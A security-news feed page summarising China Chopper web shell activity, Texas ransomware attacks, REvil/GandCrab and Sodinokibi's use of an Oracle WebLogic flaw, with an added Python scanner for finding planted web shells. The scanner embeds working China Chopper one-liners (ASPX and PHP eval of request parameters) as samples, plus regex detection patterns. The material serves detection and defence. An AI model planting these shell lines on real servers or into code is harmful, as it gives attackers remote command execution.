‘China Chopper’ web shell makes a comeback in Lebanon, other Asian countries

Malicious code first discovered nine years ago, and historically used by groups associated with Chinese state-backed hacks, has made a comeback, according to new research from Cisco’s Security and Intelligence Research Group, Talos. The hacking tool is a web shell known as China Chopper. A web shell is a script planted on a compromised web server that lets attackers run commands on it remotely through ordinary HTTP requests. This particular web shell has long been known for evading detection. “China Chopper is a slick little web shell that does not get enough exposure and credit for its stealth,” FireEye researchers wrote in 2013 in their blog on the matter. China Chopper’s code has historically been small, according to security researcher Keith Tyler, who wrote on the tool in 2012. That much appears to be the same now: Talos researchers note the most recent campaign has been “extremely simple,” containing just one […]
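
The stealth described above comes from how little a China Chopper server component contains: a single statement that feeds an HTTP request parameter straight into the language's eval sink. The following scanner is an added example, not code from CyberScoop, Talos or FireEye. It walks a web root and flags source files in which request-controlled input reaches `eval`, using patterns modelled on the publicly documented one-liners (the ASPX `eval(Request.Item[...], "unsafe")` and PHP `@eval($_POST[...])` forms). The three sample files, the function names and the file-extension list are constructed for the illustration.

```python
"""Flag web-root files where request input reaches an eval() sink.

Added example. Sample files below are constructed; the two shell bodies
follow the publicly documented China Chopper one-liners, the third file is
a benign control that also reads request input but never evaluates it.
"""
import re
from pathlib import Path
from typing import Dict, List

SAMPLES: Dict[str, str] = {
    # Constructed: ASPX variant, parameter name "password" as in public write-ups.
    "upload.aspx": '<%@ Page Language="Jscript"%>'
                   '<%eval(Request.Item["password"],"unsafe");%>',
    # Constructed: PHP variant, same shape.
    "cache.php": "<?php @eval($_POST['password']);?>",
    # Constructed benign control: request input is read, escaped and echoed.
    "index.php": "<?php echo htmlspecialchars($_GET['q']); ?>",
}

# Each pattern: an eval() call whose argument list (up to the next ';')
# contains a request-derived value. '[^;]*?' lets a wrapper such as
# base64_decode(...) sit between eval( and the request variable.
PATTERNS: Dict[str, re.Pattern] = {
    "php_eval_of_request": re.compile(
        r"\beval\s*\([^;]*?\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
    "aspx_eval_of_request": re.compile(
        r"\beval\s*\([^;]*?Request(?:\.Item|\.Form|\.QueryString)?\s*\[", re.I),
}

# Server-side source types worth scanning (assumed list; extend to taste).
SCAN_SUFFIXES = {".php", ".asp", ".aspx", ".ashx", ".jsp"}


def scan_source(text: str) -> List[str]:
    """Return the names of all patterns that match the given source text."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(text))


def scan_samples() -> Dict[str, List[str]]:
    """Run the scanner over the constructed in-memory samples."""
    return {name: scan_source(body) for name, body in SAMPLES.items()}


def scan_tree(root: Path) -> Dict[str, List[str]]:
    """Scan every file under root with a server-side suffix.

    Only files with at least one finding are reported. Reads are lenient
    (errors='ignore') because dropped shells are often not valid UTF-8.
    """
    findings: Dict[str, List[str]] = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            hits = scan_source(path.read_text(errors="ignore"))
            if hits:
                findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        status = ", ".join(hits) if hits else "clean"
        print(f"{name:12s} {len(SAMPLES[name]):4d} bytes  {status}")
```

Run it against a real web root with `scan_tree(Path("/var/www"))`. Two caveats a practitioner should keep in mind: the match is on source text, so a shell that builds the `eval` string at runtime (concatenation, `base64_decode` of the whole statement, `create_function`) slips past the regexes and needs a second signal such as new or recently modified files in the web root; and a hit is a lead, not proof, since legitimate code can call `eval` on request data, badly.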

The post ‘China Chopper’ web shell makes a comeback in Lebanon, other Asian countries appeared first on CyberScoop.


Texas Does Ransomware Bigger: 23 Local Gov’ts Attacked

Another week, another 23 local governments crippled by ransomware, in what appears to be a coordinated attack.
The post Texas Does Ransomware Bigger: 23 Local Gov’ts Attacked appeared first on Security Boulevard.

Is ‘REvil’ the New GandCrab Ransomware?

The cybercriminals behind the GandCrab ransomware-as-a-service (RaaS) offering recently announced they were closing up shop and retiring after having allegedly earned more than $2 billion in extortion payments from victims. But a growing body of evidence suggests the GandCrab team have instead quietly regrouped behind a more exclusive and advanced ransomware program known variously as “REvil,” “Sodin,” and “Sodinokibi.”

Meet Sodinokibi, a ransomware strain that exploits a critical Oracle server flaw

Hackers are exploiting a critical vulnerability in a widely used Oracle service to distribute a new strain of ransomware that attempts to encrypt data in a user’s directory, then makes recovery more difficult by deleting trustworthy backups, according to research published Tuesday. Attackers are trying to infect victims with a new variant of the Sodinokibi ransomware by leveraging a known security flaw in Oracle’s WebLogic Server, according to Cisco’s Talos threat research team. The digital extortionists are exploiting the flaw known as CVE-2019-2725, a bug with a CVSS severity score of 9.8 out of 10 that Oracle patched on April 26, outside the company’s normal patch cycle. Because the flaw is in a server-side component, no action by a victim is needed for the infection to start. “Historically, most varieties of ransomware have required some form of user interaction, such as a user opening an attachment to an email message, clicking on a malicious link, or running a piece of malware on the device,” Cisco’s Talos […]

The post Meet Sodinokibi, a ransomware strain that exploits a critical Oracle server flaw appeared first on CyberScoop.
